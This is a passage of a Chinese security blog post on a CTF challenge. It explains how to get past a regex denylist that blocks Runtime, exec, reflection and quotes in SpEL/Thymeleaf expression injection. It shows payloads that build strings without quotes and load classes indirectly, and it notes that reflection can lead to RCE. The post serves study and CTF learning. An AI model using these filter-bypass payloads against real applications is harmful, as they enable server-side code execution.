<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">&#123;<span class="hljs-string">&quot;java.+lang&quot;</span>, <span class="hljs-string">&quot;Runtime|Process|byte|OutputStream|session|\&quot;|&#x27;&quot;</span>, <span class="hljs-string">&quot;exec.*\\(&quot;</span>, <span class="hljs-string">&quot;write|read&quot;</span>, <span class="hljs-string">&quot;invoke.*\\(&quot;</span>, <span class="hljs-string">&quot;\\.forName.*\\(&quot;</span>, <span class="hljs-string">&quot;lookup.*\\(&quot;</span>, <span class="hljs-string">&quot;\\.getMethod.*\\(&quot;</span>, <span class="hljs-string">&quot;javax.+script.+ScriptEngineManager&quot;</span>, <span class="hljs-string">&quot;com.+fasterxml&quot;</span>, <span class="hljs-string">&quot;org.+apache&quot;</span>, <span class="hljs-string">&quot;org.+hibernate&quot;</span>, <span class="hljs-string">&quot;org.+thymeleaf&quot;</span>, <span class="hljs-string">&quot;javassist&quot;</span>, <span class="hljs-string">&quot;javax\\.&quot;</span>, <span class="hljs-string">&quot;eval.*\\(&quot;</span>, <span class="hljs-string">&quot;\\.getClass\\(&quot;</span>, <span class="hljs-string">&quot;org.+springframework&quot;</span>, <span class="hljs-string">&quot;javax.+el&quot;</span>, <span class="hljs-string">&quot;java.+io&quot;</span>&#125;<br></code></pre></div></td></tr></table></figure>

<p>我们从两个大的方向来考虑绕过: 不能有字符串、不可以直接用Runtime等类</p>
<h4 id="不能直接使用类"><a href="#不能直接使用类" class="headerlink" title="不能直接使用类"></a>不能直接使用类</h4><p>第一种解决办法:</p>
<p>明面上Runtime等类被禁用我们可以使用06所说的自定义类来加载进来,字符串用第二方向的办法.</p>
<p>第二种解决办法:</p>
<p>ddctf里拥有几个自定义类safafilter和com.ctf.model.User,</p>
<p>只要通过源码中的import块来找到全限定类名就可以完成绕过加载，</p>
<p>第三种:</p>
<p>还可以使用 <strong>07</strong> 提到的equest、response两个实例也可拿来加载对象。</p>
<h4 id="不能直接使用字符串"><a href="#不能直接使用字符串" class="headerlink" title="不能直接使用字符串"></a>不能直接使用字符串</h4><p>引号被过滤不可以直接使用字符串，这里提供三种构造字符串的方法</p>
<ol>
<li> <code>T(类名).getName()</code>会返回字符串类型的全限定类名</li>
</ol>
<p>比如:<code>[[$&#123;T(String).getName()&#125;]]</code>结果为java.lang.String</p>
<p>然后我们就可以使用角标来构造我们想要的字符串</p>
<figure class="highlight"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">[[$&#123;T(String).getName()[<span class="hljs-number">0</span>].replace(<span class="hljs-number">106</span>,<span class="hljs-number">104</span>)+T(String).getName()[<span class="hljs-number">0</span>].replace(<span class="hljs-number">106</span>,<span class="hljs-number">51</span>)+T(String).getName()[<span class="hljs-number">0</span>].replace(<span class="hljs-number">106</span>,<span class="hljs-number">122</span>)+T(String).getName()[<span class="hljs-number">0</span>].replace(<span class="hljs-number">106</span>,<span class="hljs-number">104</span>)+T(String).getName()[<span class="hljs-number">0</span>].replace(<span class="hljs-number">106</span>,<span class="hljs-number">49</span>)&#125;]]<br>#回显h3zh1<br></code></pre></div></td></tr></table></figure>

<p><img src="https://tva1.sinaimg.cn/large/008eGmZEly1gny5ualhsej30mt04yt91.jpg" srcset="/img/loading.gif" alt="image-20210224051129248"></p>
<ol start="2">
<li> 使用Character类构造字符串</li>
</ol>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">[[$&#123;T(Character).toString(<span class="hljs-number">104</span>)+T(Character).toString(<span class="hljs-number">51</span>)+T(Character).toString(<span class="hljs-number">122</span>)+T(Character).toString(<span class="hljs-number">104</span>)+T(Character).toString(<span class="hljs-number">49</span>)&#125;]]<br></code></pre></div></td></tr></table></figure>

<p><img src="https://tva1.sinaimg.cn/large/008eGmZEgy1go0jh80dspj30ly0e8myc.jpg" srcset="/img/loading.gif" alt="image-20210226063423691"></p>
<ol start="3">
<li> Controllable Parameter Bypass</li>
</ol>
<p>通过web请求构造字符串,request有很多方法返回值为String也有String[]用来给getMethod或者getDeclaredMethod的方法定制参数      </p>
<p><strong>post方法构造字符串</strong></p>
<figure class="highlight vbscript"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs vbscript">[[$&#123;#<span class="hljs-built_in">request</span>.getMethod().<span class="hljs-keyword">sub</span><span class="hljs-built_in">string</span>(<span class="hljs-number">0</span>,<span class="hljs-number">1</span>).<span class="hljs-built_in">replace</span>(<span class="hljs-number">80</span>,<span class="hljs-number">104</span>)%<span class="hljs-number">2</span>b#<span class="hljs-built_in">request</span>.getMethod().<span class="hljs-keyword">sub</span><span class="hljs-built_in">string</span>(<span class="hljs-number">0</span>,<span class="hljs-number">1</span>).<span class="hljs-built_in">replace</span>(<span class="hljs-number">80</span>,<span class="hljs-number">51</span>)%<span class="hljs-number">2</span>b#<span class="hljs-built_in">request</span>.getMethod().<span class="hljs-keyword">sub</span><span class="hljs-built_in">string</span>(<span class="hljs-number">0</span>,<span class="hljs-number">1</span>).<span class="hljs-built_in">replace</span>(<span class="hljs-number">80</span>,<span class="hljs-number">122</span>)%<span class="hljs-number">2</span>b#<span class="hljs-built_in">request</span>.getMethod().<span class="hljs-keyword">sub</span><span class="hljs-built_in">string</span>(<span class="hljs-number">0</span>,<span class="hljs-number">1</span>).<span class="hljs-built_in">replace</span>(<span class="hljs-number">80</span>,<span class="hljs-number">104</span>)%<span class="hljs-number">2</span>b#<span class="hljs-built_in">request</span>.getMethod().<span class="hljs-keyword">sub</span><span class="hljs-built_in">string</span>(<span class="hljs-number">0</span>,<span class="hljs-number">1</span>).<span class="hljs-built_in">replace</span>(<span class="hljs-number">80</span>,<span class="hljs-number">49</span>)&#125;]]<br></code></pre></div></td></tr></table></figure>

<p><strong>get方法构造字符串</strong></p>
<figure class="highlight"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">[[$&#123;#request.getMethod().substring(0,1).replace(71,104)%2b#request.getMethod().substring(0,1).replace(71,51)%2b#request.getMethod().substring(0,1).replace(71,122)%2b#request.getMethod().substring(0,1).replace(71,104)%2b#request.getMethod().substring(0,1).replace(71,49)&#125;]]<br></code></pre></div></td></tr></table></figure>

<p><strong>外部的cookie绕过</strong></p>
<p><code>[[$&#123;#request.getRequestedSessionId()&#125;]]</code></p>
<p><img src="https://tva1.sinaimg.cn/large/008eGmZEly1gny6w7vqwyj30o201yt8s.jpg" srcset="/img/loading.gif" alt="image-20210224054758847"></p>
<p>其实完全可以通过<strong>getParameterValues</strong>方法的来获取String[]的class，配合任意一个request返回值为string的函数来完成反射的调用,从而<strong>rce</strong> , ,或许你的构造会用到substring、replace，有兴趣的可以尝试一下</p>
<p><strong>参考 :</strong></p>
<p>Ruilin 由浅入深SpEL表达式注入漏洞 : <a target="_blank" rel="noopener" href="http://rui0.cn/archives/1043">http://rui0.cn/archives/1043</a></p>
<p>EL : <a target="_blank" rel="noopener" href="https://www.runoob.com/jsp/jsp-expression-language.html">https://www.runoob.com/jsp/jsp-expression-language.html</a></p>
<p>SpEL : <a target="_blank" rel="noopener" href="https://docs.spring.io/spring-framework/docs/current/reference/html/core.html#expressions">https://docs.spring.io/spring-framework/docs/current/reference/html/core.html#expressions</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/02/28/%E7%A5%9E%E5%A5%87%E5%8A%A8%E7%89%A9%E5%9C%A8%E5%93%AA%E9%87%8C/">
                        <span class="hidden-mobile">SpEL注入研究</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments">
                
                
  <div class="disqus" style="width:100%">
    <div id="disqus_thread"></div>
    <script type="text/javascript">
      var disqus_config = function() {
        this.page.url = 'http://example.com/2021/03/07/spel%E6%B3%A8%E5%85%A5%E7%A0%94%E7%A9%B6/';
        this.page.identifier = '/2021/03/07/spel%E6%B3%A8%E5%85%A5%E7%A0%94%E7%A9%B6/';
      };
      Fluid.utils.waitElementVisible('disqus_thread', function () {
        var d = document, s = d.createElement('script');
        s.src = '//' + '' + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', new Date());
        (d.head || d.body).appendChild(s);
      });
    </script>
    <noscript>Please enable JavaScript to view the
      <a target="_blank" href="https://disqus.com/?ref_noscript" rel="nofollow noopener noopener">comments powered by Disqus.</a>
    </noscript>
  </div>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <span>记录一些有趣的事</span>
  </div>
  

  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
